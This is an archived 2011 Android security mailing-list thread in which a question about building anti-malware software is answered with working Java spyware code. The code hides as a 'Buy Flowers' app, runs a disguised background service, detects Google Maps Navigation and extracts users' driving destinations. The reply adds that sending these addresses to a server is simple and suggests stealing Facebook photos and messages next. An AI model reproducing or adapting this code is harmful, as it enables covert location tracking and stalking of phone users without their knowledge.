Hello Ryan,
Thank you very much for your advice,
and for the code,
and for the humor! ("Don't let spouse buy you flowers -- it's a
front!" Haaa! )
It is really nice of you. Thank you!
Fal
On Sep 16, 1:00 pm, Ryan Mattison <[email protected]> wrote:
> Hey Buddy,
>
> I responded to your post in a blog style post because it is
> cleaner.http://www.ryangmattison.com/post/2011/09/16/Monitor-Android-Navigati...
>
> Hopefully this gets you started. I'll post the response here as
> well, but I don't think it will be readable.
>
> Monitor Android Navigation - Malware
> By Ryan Mattison16. September 2011 12:24
> There was a question on the Google discussion boards about how to
> write malware protection software for Android. A think a good
> approach to this would be to first write some Malware polling
> functions.
>
> Post
>
> Hello everybody!
>
> I need your help, please. Boss wants me to create an Android App for
> preventing all malware, known and unknown, from actually executing.
> So this is what I think I must do, but could you please validate?
> Thank you!:---
>
> 1. I must create a rules set of acceptable function call flows
> which every App must conform to. Any App that starts executing a
> strange function call sequence is considered malware and gets killed.
> Can I create this rule set with the on-device SQLite RDB?
>
> 2. I must create a service component running in the background.
> This must periodically poll every running App and compare its function
> call flow against my rule set RDB.
>
> 3. Can I achieve all this with just the Android SDK? Or will I
> have to use the Android NDK as well? I don't want to use the NDK
> unless I have to.
>
> 4. I went through the very helpful tutorial "Understanding
> Android's Security Framework" by William Enck and Patrick McDaniel.
> Is this a new Framework introduced into the Android Libraries layer?
>
> 5. Any good book I could buy to guide me through all this?
>
> Thank you very much.
>
> Fal
>
> Let's us assume we have a thread spinning on a separate process
> indefinitely after our "Buy Flowers" application is downloaded off the
> Market. The information we want to monitor is Google Maps Navigation
> for Android. Where are user's driving to & when. Our application
> will poll every 20-30 minutes since the history stack will retain this
> information, so it doesn't matter if we catch it in action.
>
> ?
> 1
> <service android:name="com.ninja.who.StealFromGoogleNavigation"
> android:process=":UpdateFlowers" />
> I'm fairly certain in the application manager it will now have the
> flowers application open. If the user has any questions, they can
> expand it. It'll show process UpdateFlowers. They'll go on with the
> day.
>
> We start the polling, we should check if Google Maps navigation is
> running. If it is we'll return true. For this application, we are just
> going to catch it while running.
>
> private boolean IsNavigationRunning(ActivityManager as)
> {
>
> ActivityManager as = (ActivityManager) context
> .getSystemService(Activity.ACTIVITY_SERVICE);
> List<RunningTaskInfo> rutiList = as.getRunningTasks(100);
>
> for (RunningTaskInfo ruti : rutiList)
> {
> if (ruti.baseActivity
> .getClassName()
> .equalsIgnoreCase(
>
> "com.google.android.maps.driveabout.app.NavigationActivity")
> &&
> ruti.baseActivity.getPackageName().equalsIgnoreCase(
> "com.google.android.apps.maps"))
> {
> return true;
> }
> }
>
> return false;
> }
> Using the ActivityManager, we looking through the running task manager
> for the Android Maps application
>
> Following this, we want to see what address they are traveling too.
> Since it is using the public intent system, this is easily traceable.
>
> private String UsersDestination(Context context, ActivityManager as)
> {
> ActivityManager as = (ActivityManager) context
> .getSystemService(Activity.ACTIVITY_SERVICE);
> List<RecentTaskInfo> rtiList = as.getRecentTasks(1000,
> ActivityManager.RECENT_WITH_EXCLUDED);
>
> for (RecentTaskInfo rti : rtiList)
> {
> if (rti.baseIntent != null && rti.baseIntent.getAction() !
> = null
> && rti.baseIntent.getComponent() != null &&
> rti.baseIntent.getComponent().getClassName() !=
> null &&
>
> rti.baseIntent.getAction().equals(Intent.ACTION_VIEW)
> && rti.baseIntent
> .getComponent()
> .getClassName()
> .equalsIgnoreCase(
>
> "com.google.android.maps.driveabout.app.NavigationActivity"))
> {
> rti.baseIntent.getData().toString();
> String addressURI =
> rti.baseIntent.getData().toString();
> System.out.println("AddressURI: " + addressURI);
>
> String googleNav = "google.navigation:";
> String titleNav = "title=";
> String queryNav = "&q=";
> if(addressURI.contains(queryNav))
> {
> addressURI =
> addressURI.substring(addressURI.indexOf(titleNav),
> addressURI.indexOf(queryNav));
> addressURI =
> addressURI.substring(titleNav.length());
> addressURI = addressURI.replaceAll("\\+", " ");
> }
> else if(addressURI.contains(titleNav))
> {
> addressURI =
> addressURI.substring(addressURI.indexOf(titleNav));
> addressURI =
> addressURI.substring(titleNav.length());
> addressURI = addressURI.replaceAll("\\+", " ");
> }
> else if(addressURI.contains(googleNav))
> {
> addressURI =
> addressURI.substring(addressURI.indexOf(googleNav));
> addressURI =
> addressURI.substring(googleNav.length());
> addressURI = addressURI.replaceAll("\\+", " ");
> }
>
> return addressURI;
> }
> }
> return "";
> }
> This is older code, there is actually a way to print out way
> friendlier messages. I'll leave the exercise up for grabs. Very simple
> to grab the address you navigate to on your phone and send them off to
> a server. Don't let your husband buy you flowers using your phone, its
> a FRONT!
>
> To expand on this exercise, you can start stealing the Facebook Share
> Intents. Get photos, messages, updates etc. You can steal a lot more
> fun information from the Facebook application if you work at it.
>
> Thanks for reading,
>
> Ryan Mattison
>
> On Sep 15, 2:43 pm, fal <[email protected]> wrote:
>
>
>
>
>
>
>
> > Hello everybody!
>
> > I need your help, please. Boss wants me to create an Android App for
> > preventing all malware, known and unknown, from actually executing.
> > So this is what I think I must do, but could you please validate?
> > Thank you!:---
>
> > 1. I must create a rules set of acceptable function call flows
> > which every App must conform to. Any App that starts executing a
> > strange function call sequence is considered malware and gets killed.
> > Can I create this rule set with the on-device SQLite RDB?
>
> > 2. I must create a service component running in the background.
> > This must periodically poll every running App and compare its function
> > call flow against my rule set RDB.
>
> > 3. Can I achieve all this with just the Android SDK? Or will I
> > have to use the Android NDK as well? I don't want to use the NDK
> > unless I have to.
>
> > 4. I went through the very helpful tutorial "Understanding
> > Android's Security Framework" by William Enck and Patrick McDaniel.
> > Is this a new Framework introduced into the Android Libraries layer?
>
> > 5. Any good book I could buy to guide me through all this?
>
> > Thank you very much.
>
> > Fal
--
You received this message because you are subscribed to the Google Groups
"Android Security Discussions" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/android-security-discuss?hl=en.
